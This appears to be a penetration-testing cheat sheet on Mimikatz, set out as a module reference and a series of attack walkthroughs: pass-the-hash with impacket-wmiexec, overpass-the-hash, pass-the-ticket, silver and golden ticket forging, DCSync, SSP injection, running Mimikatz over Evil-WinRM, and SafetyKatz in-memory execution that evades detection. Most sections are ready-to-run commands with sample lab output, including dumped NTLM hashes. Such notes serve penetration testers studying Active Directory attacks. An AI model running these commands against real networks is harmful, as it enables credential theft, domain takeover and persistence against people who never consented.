Mimikatz

mimikatz is a powerful post-exploitation tool used to extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory on Windows systems. It is commonly used by penetration testers and attackers to escalate privileges and move laterally within networks. It has a binary as well as a .ps1 implementation.

Modules

LSADump

The lsadump module dumps credentials from the Local Security Authority (LSA) framework. Most of these commands require either debug rights (privlege::debug) or local System (token::elevate). By default, the Administrators group has the SeDebugPrivilege.

Command

Description

lsadump::lsa

Extracts LSA secrets from the SECURITY hive or memory

lsadump::sam

Dumps local account hashes from the SAM hive

lsadump::secrets

Parses the decrypted LSA secrets

lsadump::cache

Gets MSCache (cached domain logons)

lsadump::dcsync

Simulates a DC and pulls secrets over LDAP

SekurLSA

The sekurlsa module is used to extract credentials from the protected Local Security Authority Subsystem Service (LSASS) memory. Similarly to the lsadump module, it requires either debug rights (privlege::debug) or local System (token::elevate).

# Enable the SeDebugPrivilege
privilege::debug

# Escalate privileges to SYSTEM
token::elevate

Command

Description

sekurlsa::logonpasswords

Extracts all available credentials from LSASS: NTLM hashes, plaintext passwords (if available), Kerberos tickets, etc.

sekurlsa::tickets

Dumps all tickets in all sessions from LSASS

sekurlsa::kerberos

Extracts Kerberos tickets (TGTs, TGs) for current user from LSASS

sekurlsa::ekeys

Extracts Kerberos encryption keys (aes256, rc4)

sekurlsa::wdigest

Retrieves plaintext passwords if WDigest is enabled

sekurlsa::ssp

Extracts credentials used by Security Support Provider packages

sekurlsa::livessp

Targets LiveSSP credentials (rare)

sekurlsa::tspkg

Dumps credentials from the Terminal Services package

sekurlsa::msv

Dumps credentials from the MSV1_0 package (local logons and NTLM hashes)

Lateral Movement

Pass-the-Hash

For more info about this attack, see here.

mimikatz # privilege::debug
Privilege '20' OK

Domain hashes are stored in memory of the LSASS process.

mimikatz # sekurlsa::logonpasswords
<SNIP>

Authentication Id : 0 ; 5468350 (00000000:005370be)
Session           : RemoteInteractive from 5
User Name         : Administrator
Domain            : CORP
Logon Server      : SERVERWK248
Logon Time        : 9/19/2024 2:08:28 AM
SID               : S-1-5-21-1711441587-1152167230-1972296030-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CORP
         * NTLM     : 160c0b16dd0ee77e7c494e38252f7ddf
<SNIP>

With the Domain Administrator's hash, we can perform the PtH attack.


$ impacket-wmiexec -debug -hashes :160c0b16dd0ee77e7c494e38252f7ddf CORP/Administrator@192.168.50.248
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] SMBv3.0 dialect used
[+] Target system is 192.168.50.248 and isFQDN is False
[+] StringBinding: SERVERWK248[64285]
[+] StringBinding: 192.168.50.248[64285]
[+] StringBinding chosen: ncacn_ip_tcp:192.168.50.248[64285]
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>

Overpass-the-Hash

For more info about this attack, see here.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
...
NTLM : 369def79d8372408bf6e93364cc93075
...

Use a Kerberos-authenticated service, e.g. CIFS, to convert the NTML to a TGT.

# List cached tickets
> klist
...
Cached Tickets: (0)

# Kerberos-based authentication service
> net use \\files04
The command completed successfully.

# List cached tickets
> klist
...
Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com

Pass-the-Ticket

For more info about this attack, see here.

privilege::debug
sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

Find the relevant ticket.

> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...

Inject it into the current session.

mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
        
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

Silver Ticket

For more info about this attack, see here.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

User Name : iis_service
NTLM      : 4d28cf5252d39971419580a51484ca09
SID       : S-1-5-21-1987370270-658905905-1781884369-1109

mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin
Golden ticket for 'jeffadmin @ corp.com' successfully submitted for current session

# List cached tickets
> klist
Client: jeffadmin @ corp.com
Server: http/web04.corp.com @ corp.com
Ticket Flags: forwardable renewable pre_authent

# Exploit
> iwr -UseDefaultCredentials http://web04
StatusCode        : 200
StatusDescription : OK
...

DCSync

For more info about this attack, see here.

mimikatz # lsadump::dcsync /user:corp\dave
...
SAM Username         : dave
NTLM Hash            : 08d7a47a6f9f66b97b1bae4178747494
LM Hash              : 45bc7d437911303a42e764eaf8fda43e
...

SSP Injection

For more info about this attack, see here.

mimikatz # misc::memssp
Injected =)

Persistence

Golden Ticket

For more info about this attack, see here.

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
...
User : krbtgt
NTLM : 1693c6cefafffc7af11ef34d1c788f47

Delete existing Kerberos tickets.

mimikatz # kerberos::purge

Create the GT.

mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-... /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
...
Golden ticket for 'jen @ corp.com' successfully submitted for current session

Launch a new session using the current security context.

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800

Exploit.

# Use hostname, not IP address as the latter forces NTML auth
> PsExec.exe \\dc1 cmd.exe

Mimikatz via WinRM

When using mimikatz via a WinRM session it won't run as expected because it’s launched in a non-interactive session. This prevents it from creating or accessing a console. This results in repeated prompts and no actual output. The solution to this issue is to run it with a non-interactive command:

*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

SafetyKatz

To evade detection, tools like Mimikatz are often executed in-memory using .NET-based PE loaders such as PELoader. For example, sekurlsa::ekeys or sekurlsa::logonpasswords can be run directly from memory without writing the Mimikatz binary to disk.

SafetyKatz integrates this approach, combining a modified Mimikatz with an embedded loader. It first generates a minidump of LSASS via the MiniDumpWriteDump API (typically to C:\Windows\Temp\debug.bin), then loads the dump and parses credentials in-memory before cleaning up artifacts.

Resources

The Unofficial Guide to Mimikatz & Command Reference by AD Security (article)

PreviousLDAPsearch NextNetExec

Last updated 6 months ago

Was this helpful?